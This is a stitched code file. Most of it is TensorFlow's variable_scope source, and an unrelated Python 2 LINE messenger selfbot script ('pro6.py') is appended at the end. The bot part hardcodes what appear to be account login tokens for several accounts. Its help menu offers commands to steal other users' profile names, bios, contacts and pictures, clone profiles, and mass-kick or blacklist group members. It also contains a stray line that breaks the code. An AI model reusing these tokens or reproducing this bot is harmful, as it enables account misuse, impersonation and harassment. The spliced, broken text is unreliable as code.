or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be creates instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables), here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exists ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scopes names are also generated
only on a per thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For e.g.
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If name_or_scope is provided it
won't be used and therefore it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it only takes effect for once when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if not self._building_function:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
use_resource: if True, a ResourceVariable is always created.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, GradientTapes automatically watch
uses of this Variable.
validate_shape: If `False`, allows the variable to be initialized with a
value of unknown shape. If `True`, the default, the shape of
`initial_value` must be known.
caching_device: Optional device string describing where the Variable
should be cached for reading. Defaults to the Variable's device.
If not `None`, caches on another device. Typical use is to cache
on the device where the Ops using the Variable reside, to deduplicate
copying through `Switch` and other conditional statements.
name: Optional name for the variable. Defaults to `'Variable'` and gets
uniquified automatically.
dtype: If set, initial_value will be converted to the given type.
If `None`, either the datatype will be kept (if `initial_value` is
a Tensor), or `convert_to_tensor` will decide.
constraint: A constraint function to be applied to the variable after
updates by some algorithms.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
This set may grow over time, so it's important the signature of creators is as
mentioned above.
Args:
variable_creator: the passed creator
Yields:
A scope in which the creator is active
"""
with ops.get_default_graph()._variable_creator_scope(variable_creator): # pylint: disable=protected-access
yield
|
pro6.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
from bs4 import BeautifulSoup
import time, random, sys, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, urllib2, wikipedia,tempfile,glob,shutil,unicodedata,goslate
from gtts import gTTS
#tinkerbell
cl = LINETCR.LINE()
cl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
cl.loginResult()
kt = LINETCR.LINE()
kt.login(token="EnnlBHTi4QbQKi1Xqla3.TrVjFf5pyd8D+ZxPusvq0W.HDtFuFulskxycJocqYbAK9krFT5ixRMAnrjU3XcDogI=")
kt.loginResult()
ks = LINETCR.LINE()
ks.login(token="EnlRYqL4DlWKIr9dfIU2.WUI0jVzzeewupQ5tboz8mG.K5G366kQX+YWWdGRGXAwMU2rHcF2hhu0Lm3JmSNUPKI=")
ks.loginResult()
ki = LINETCR.LINE()
ki.login(token="En8i8ZAR1hsJLRcqWJB7.7aNdCEtbMUaAO9Hiv0qoTW.WOSasGBkESFnM7P/TCYn6cTcF2U7Lgr396M1Yt/z8qo=")
ki.loginResult()
kk = LINETCR.LINE()
kk.login(token="EnrNejwvrgZlyCoYjSdc.SJRuNecAXNC8sHurfor2ha.jD7wclOBbItb9PXfzVA4BhBq5AkfkfdpkQBVbAigijw=")
kk.loginResult()
kc = LINETCR.LINE()
kc.login(token="EnXJYMPRuZKWp81hPsk2.buJLD7JrrngDnMf5qDfqyG.60g8dV2Qm2DALXdsVgdjfN7PLoRXoNEm9dLRphHFgjM=")
kc.loginResult()
kicker ghost
kl = LINETCR.LINE()
kl.login(token="EnOhPKGkwimXJ8iVuIv5.nqZhqiZgZilGvU4eyth5jq.iV+ciJ+WAZnNjnVY0O8nKYgN1+R6664CfqfnUEnaGW8=")
kl.loginResult()
print "(☆─┅═ই╬adhi☆)(2 s"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage= """
✍️MODIFIER✍️
🔑❂͜͡➣ Bot1 rename:[text]
🔑❂͜͡➣ Bot2 rename:[text]
🔑❂͜͡➣ Bot3 rename:[text]
🔑❂͜͡➣ Bot4 rename:[text]
🔑❂͜͡➣ Bot5 rename:[text]
🔑❂͜͡➣ Bot6 rename:[text]
🔑❂͜͡➣ All rename:[text]
🔑❂͜͡➣ Allbio:[text]
🔑❂͜͡➣ Bot1 clone @[name]
🔑❂͜͡➣ Bot2 clone @[name]
🔑❂͜͡➣ Bot3 clone @[name]
🔑❂͜͡➣ Bot4 clone @[name]
🔑❂͜͡➣ Bot5 clone @[name]
🔑❂͜͡➣ Bot6 clone @[name]
🔑❂͜͡➣ Comment:[text]
🔑❂͜͡➣ Message:[text]
🔑❂͜͡➣ Bot1-6 backup run
🔑❂͜͡➣ Bot1-6 backup
🔑❂͜͡➣ Group name:[text]
🔆═══════════════════🔆
🔏️PROMOTE/DEMOTE🔏
🔏❂͜͡➣ Admin on @[name]
🔏❂͜͡➣ Expel on @[name]
🔏❂͜͡➣ Expelall
💥═══════════════════💥
🔆️STEALING✍🔆
💀❂͜͡➣ Steal name @[name]
💀❂͜͡➣ Steal Bio @[name]
💀❂͜͡➣ Steal status @[name]
💀❂͜͡➣ Steal mid @[name]
💀❂͜͡➣ Steal contact @[name]
💀❂͜͡➣ Steal cover @[name]
💀❂͜͡➣ Steal pict @[name]
💀❂͜͡➣ Steal group pict
💀❂͜͡➣ Midpict:[mid]
💀❂͜͡➣ Copy @[name]
💀❂͜͡➣ Kembali ke asli
💀👻═════════════👻
👿️GUARD MODE👿
👿❂͜͡➣ Protect:low
👿❂͜͡➣ Protect:hight
👻════════════👻
👺MARK TO LIST👺
📲❂͜͡➣ Ban @[name]
📲❂͜͡➣ Unban @[name]
📲❂͜͡➣ Ban group:
📲❂͜͡➣ Del ban:
📲❂͜͡➣ List ban group
📲❂͜͡➣ Banned[send contact]
📲❂͜͡➣ Unbanned[send contact]
📲❂͜͡➣ Ban repeat @[name]
📲❂͜͡➣ Blacklist all
